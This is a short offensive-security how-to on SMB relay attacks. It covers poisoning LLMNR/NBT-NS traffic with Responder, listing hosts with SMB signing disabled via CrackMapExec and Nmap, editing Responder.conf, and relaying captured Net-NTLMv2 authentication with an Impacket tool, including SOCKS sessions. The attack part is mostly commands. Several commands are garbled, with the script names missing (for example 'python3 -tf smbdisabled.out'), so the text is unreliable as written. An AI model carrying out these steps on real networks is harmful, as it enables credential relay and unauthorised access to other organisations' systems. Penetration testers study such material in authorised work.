SMB Relaying

After observing LLMNR and/or NBT-NS traffic with Responder and forcing the client to authenticate to your machine, it is possible for the attacker to relay the Net-NTLMv2 hash obtained to all systems within scope that have SMB Signing Disabled.

Identifying Systems with SMB Signing Disabled

Finger is included with in the /tools directory. Simply run the tool against either a subnet or file and parse the results using cut

python3 -i $subnet


A list can also easily be created with CrackMapExec:

crackmapexec smb $subnet --gen-relay-list 


Nmap can also create a list of hosts that have SMB Signing Disabled:

nmap --script=smb-security-mode -p445 $ip

SMB Relaying 101

After confirming LLMNR/NBT-NS traffic and identifying systems with SMB Signing Disabled, we are ready to perform the attack. First, we need modify the Responder.conf file and disable both SMB and HTTP:

# responder.conf

SQL = On
SMB = Off    
Kerberos = On
FTP = On
POP = On
HTTP = Off
DNS = On

We can then run Responder:

responder -I eth0 -dwP

We can then run from Impacket, supplying our file of hosts previously identified to have SMB Signing Disabled.

# Example generic relaying
python3 -tf smbdisabled.out --smb2support

# Save hashes from relaying locally
python3 -tf smbdisabled.out --smb2support -of

Relaying with SOCKS

We can also enable SOCKS support while relaying for interactive sessions. Using this flag will also provide you with a session on the host if the user is not a local administrator:

python3 -tf smbdisabled.out --smb2support --socks


Last updated